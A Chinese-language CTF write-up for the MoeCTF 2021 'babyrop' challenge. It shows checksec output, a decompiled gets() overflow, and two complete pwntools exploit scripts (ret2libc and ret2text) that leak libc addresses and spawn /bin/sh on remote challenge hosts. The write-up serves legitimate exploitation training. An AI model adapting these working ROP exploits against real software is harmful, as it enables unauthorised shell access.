[MoeCTF 2021]babyrop

Problem: [MoeCTF 2021]babyrop

思路

1. checksec

   [*] './babyrop'
   Arch: i386-32-little
   RELRO: Partial RELRO
   Stack: No canary found
   NX: NX enabled
   PIE: No PIE (0x8048000)
   Stripped: No

2. decompile

   int vuln()
   {
     char s[36]; // [esp+0h] [ebp-28h] BYREF
   
     gets(s);
     return 0;
   }
   int __cdecl main(int argc, const char **argv, const char **envp)
   {
     setvbuf(stdout, 0, 2, 0);
     setvbuf(stdin, 0, 2, 0);
     puts("Hello,here is lacanva\n");
     puts("I'm a fan of vtubers\n");
     puts("But one day Nana7mi and Azi start their live boradcast at the same time\n");
     puts("Whose live boradcast should I watch?");
     puts("Can you give me some advise?");
     vuln(&argc);
     return 0;
   }
   ​
               
   AI代码解释
               
                   
               
           

EXP

解法一，ret2libc

from pwn import *

f = "./babyrop"
context.binary = elf = ELF(f)
context.log_level = "debug"
# io = process(f)
io = remote("node5.anna.nssctf.cn", 25554)
rop = ROP(elf)
ret = rop.find_gadget(["ret"])[0]
main_addr = elf.sym['main']
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]

payload = b"a" * 0x2c + p32(puts_plt) + p32(main_addr) + p32(puts_got)
io.sendlineafter(b"Can you give me some advise?\n", payload)
puts_addr = u32(io.recvuntil(b"\xf7")[-4:])
success("puts_addr: " + hex(puts_addr))

payload = b"a" * 0x2c + p32(puts_plt) + p32(main_addr) + p32(elf.got['gets'])
io.sendlineafter(b"Can you give me some advise?\n", payload)
gets_addr = u32(io.recvuntil(b"\xf7")[-4:])
success("gets_addr: " + hex(gets_addr))


filename = libcdb.search_by_symbol_offsets(
    {"puts": puts_addr & 0xFFF, "gets": gets_addr & 0xFFF}, select_index=1
)
libc = ELF(filename)
libc.address = puts_addr - libc.sym["puts"]
system_addr = libc.sym["system"]
binsh_addr = next(libc.search(b"/bin/sh"))
success("system_addr: " + hex(system_addr))
success("binsh_addr: " + hex(binsh_addr))
payload = b"a" * 0x2c + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
io.sendlineafter(b"Can you give me some advise?\n", payload)
io.interactive()

​
            
AI代码解释
            
                
            
        

解法二，ret2text

from pwn import *

f = "./babyrop"
context.binary = elf = ELF(f)
context.log_level = "debug"
# io = process(f)
io = remote("node5.anna.nssctf.cn", 28259)
bss_addr = 0x804A028
payload = (
    b"a" * 0x2C
    + p32(elf.plt["gets"])
    + p32(elf.plt["system"])
    + p32(bss_addr)
    + p32(bss_addr)
)
io.sendline(payload)
io.sendline(b"/bin/sh")
io.interactive()

​
            
AI代码解释
            
                
            
        

总结

ret2libc.